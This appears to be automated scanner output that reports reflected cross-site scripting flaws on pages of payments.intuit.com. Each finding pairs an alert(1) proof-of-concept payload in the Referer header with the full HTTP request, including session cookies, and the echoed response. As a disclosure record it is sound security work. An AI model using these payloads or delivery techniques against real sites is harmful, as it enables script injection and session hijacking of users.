Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ee311--><script>alert(1)</script>ebc26ad0fcf
The value of the Referer HTTP header is copied into an HTML comment. The payload d4413--><script>alert(1)</script>903e8593f48 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, techniques have existed that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit the XSS flaw. For the Referer header in particular, an attacker also controls the reflected value whenever the victim follows a link from an attacker-controlled page whose URL carries the payload, to the extent the victim's browser still sends the full referring URL (current referrer-policy defaults strip the path and query on cross-origin navigations). This limitation therefore only partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=d4413--><script>alert(1)</script>903e8593f48
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c386'-alert(1)-'4f235ab0373 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, techniques have existed that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit the XSS flaw. For the Referer header in particular, an attacker also controls the reflected value whenever the victim follows a link from an attacker-controlled page whose URL carries the payload, to the extent the victim's browser still sends the full referring URL (current referrer-policy defaults strip the path and query on cross-origin navigations). This limitation therefore only partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=4c386'-alert(1)-'4f235ab0373
Response
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=4c386'-alert(1)-'4f235ab0373';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd842'-alert(1)-'54daf563e41 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically, and the browser normally keeps the original Referer on the redirected request, so the header value still reaches the final page.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, techniques have existed that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit the XSS flaw. For the Referer header in particular, an attacker also controls the reflected value whenever the victim follows a link from an attacker-controlled page whose URL carries the payload, to the extent the victim's browser still sends the full referring URL (current referrer-policy defaults strip the path and query on cross-origin navigations). This limitation therefore only partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=dd842'-alert(1)-'54daf563e41
Response
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=dd842'-alert(1)-'54daf563e41';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 6a030--><script>alert(1)</script>f0702fdbff1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically, and the browser normally keeps the original Referer on the redirected request, so the header value still reaches the final page.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, techniques have existed that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit the XSS flaw. For the Referer header in particular, an attacker also controls the reflected value whenever the victim follows a link from an attacker-controlled page whose URL carries the payload, to the extent the victim's browser still sends the full referring URL (current referrer-policy defaults strip the path and query on cross-origin navigations). This limitation therefore only partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=6a030--><script>alert(1)</script>f0702fdbff1
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload addb8'-alert(1)-'021e03ba62f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, techniques have existed that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit the XSS flaw. For the Referer header in particular, an attacker also controls the reflected value whenever the victim follows a link from an attacker-controlled page whose URL carries the payload, to the extent the victim's browser still sends the full referring URL (current referrer-policy defaults strip the path and query on cross-origin navigations). This limitation therefore only partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=addb8'-alert(1)-'021e03ba62f
Response
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=addb8'-alert(1)-'021e03ba62f';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload a2606--><script>alert(1)</script>36ea6b49a2c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, techniques have existed that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit the XSS flaw. For the Referer header in particular, an attacker also controls the reflected value whenever the victim follows a link from an attacker-controlled page whose URL carries the payload, to the extent the victim's browser still sends the full referring URL (current referrer-policy defaults strip the path and query on cross-origin navigations). This limitation therefore only partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=a2606--><script>alert(1)</script>36ea6b49a2c
The value of the Referer HTTP header is copied into an HTML comment. The payload 1478c--><script>alert(1)</script>ce81d71fd63 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=1478c--><script>alert(1)</script>ce81d71fd63
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caed3'-alert(1)-'2634c597979 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=caed3'-alert(1)-'2634c597979
Response
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=caed3'-alert(1)-'2634c597979';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload ef8c6--><script>alert(1)</script>b4f50ac6cd0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ef8c6--><script>alert(1)</script>b4f50ac6cd0
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86458'-alert(1)-'2f8b7b8371f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=86458'-alert(1)-'2f8b7b8371f
Response
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=86458'-alert(1)-'2f8b7b8371f';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ecbd'-alert(1)-'a54af6c28ec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
